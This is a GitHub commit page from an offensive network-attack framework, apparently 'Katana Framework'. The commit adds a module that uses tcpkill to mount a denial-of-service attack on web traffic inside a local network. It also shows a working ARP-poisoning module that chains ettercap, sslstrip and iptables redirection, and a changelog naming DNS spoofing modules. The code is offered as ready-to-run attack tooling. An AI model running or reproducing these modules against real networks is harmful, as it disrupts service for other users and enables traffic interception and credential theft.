Skip to content

Commit

Permalink
New Module: net/web.dos
Browse files Browse the repository at this point in the history
  • Loading branch information
root committed Jul 30, 2016
1 parent c057f79 commit 98a2688
Show file tree
Hide file tree
Showing 5 changed files with 64 additions and 6 deletions.
5 changes: 4 additions & 1 deletion LINETIME
Original file line number Diff line number Diff line change
@@ -1,3 +1,6 @@
* 30/07/16
Added New Module : net/web.dos, for web D.O.S in Local Area Network

* 29/07/16
Change Name-Code Module : at.arpsp -> net/arp.pson
Adedd New Module: dns.spoof, dns spoofing attack
Expand All @@ -18,4 +21,4 @@
* 21/07/16
Added New module : dns.fake, dns server for spoof dns
List Reset in module net/sc.hosts
Fixed errors in clt/clt.ftp module
Fixed errors in clt/clt.ftp module
9 changes: 8 additions & 1 deletion core/modules.xml
Original file line number Diff line number Diff line change
Expand Up @@ -90,6 +90,13 @@
<category>net</category>
<filename>dns_fake</filename>
<description>DNS fake Server Spoof.</description>
</module>
<module name="net/web.dos">
<version>1.0</version>
<author>RedToor</author>
<category>net</category>
<filename>web_killer</filename>
<description>Web D.O.S Attack in LAN.</description>
</module>
<module name="set/facebrok">
<version>1.0</version>
Expand All @@ -103,7 +110,7 @@
<author>Redtoor</author>
<category>set</category>
<filename>hotspot_web</filename>
<description>Gathering Information for web.</description>
<description>Gathering Information with web.</description>
</module>
<module name="set/em.boom">
<version>1.0</version>
Expand Down
3 changes: 0 additions & 3 deletions ktf.tool
Original file line number Diff line number Diff line change
Expand Up @@ -2,9 +2,6 @@
#HEAD#########################################################
#
# Katana Framework | ktf.tool
# Building...
#
#
# Last Modified: 03/06/2016
#
#########################################################HEAD#
Expand Down
3 changes: 2 additions & 1 deletion modules/net/arp_poisoning_attack.py
Original file line number Diff line number Diff line change
Expand Up @@ -40,6 +40,7 @@ def init():

# CODE MODULE ############################################################################################
def main(run):

if isConect() and checkDevice(init.var['interface']):
printAlert(0,"Starting ARP Poisoning [ettercap].")
commands.getoutput("iptables --flush -t nat")
Expand All @@ -50,7 +51,7 @@ def main(run):
commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
commands.getoutput("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")
Subprocess("sslstrip")
raw_input(printAlert(8,"to Stop Attack ARP (PRESS ANY KEY)\n"))
raw_input(printAlert(8,"to Stop ARP Attack (PRESS ANY KEY)\n"))
commands.getoutput("killall ettercap")
commands.getoutput("killall sslstrip")
commands.getoutput("iptables --flush -t nat")
Expand Down
50 changes: 50 additions & 0 deletions modules/net/web_killer.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
# This module requires katana framework
# https://github.com/PowerScript/KatanaFramework

# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #
# Katana Core import #
from core.KATANAFRAMEWORK import * #
# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #

# LIBRARIES
from core.Function import get_interfaces,Subprocess,isConect,checkDevice
import commands
# END LIBRARIES

# INFORMATION MODULE
def init():
init.Author ="RedToor"
init.Version ="1.0"
init.Description ="Web D.O.S Attack in LAN."
init.CodeName ="net/web.dos"
init.DateCreation ="31/07/2016"
init.LastModification ="31/07/2016"
init.References =None
init.License =KTF_LINCENSE
init.var ={}

# DEFAULT OPTIONS MODULE
init.options = {
# NAME VALUE RQ DESCRIPTION
'interface':[INTERFACE_ETHERNET,True ,'Interface'],
'target' :["www.test.com" ,True ,'DNS Target']
}

init.aux = """
Devices Founds: """+str(get_interfaces())+"""
"""
return init
# END INFORMATION MODULE

# CODE MODULE ############################################################################################
def main(run):

if isConect() and checkDevice(init.var['interface']):
commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forwar")
printAlert(0,"Starting WEB D.O.S Attack in LAN")
Subprocess("tcpkill -i "+init.var['interface']+" -9 host "+init.var['target'])
raw_input(printAlert(8,"to Stop WEB D.O.S Attack (PRESS ANY KEY)\n"))
commands.getoutput("killall tcpkill")
commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forwar")

# END CODE MODULE ############################################################################################

0 comments on commit 98a2688

Please sign in to comment.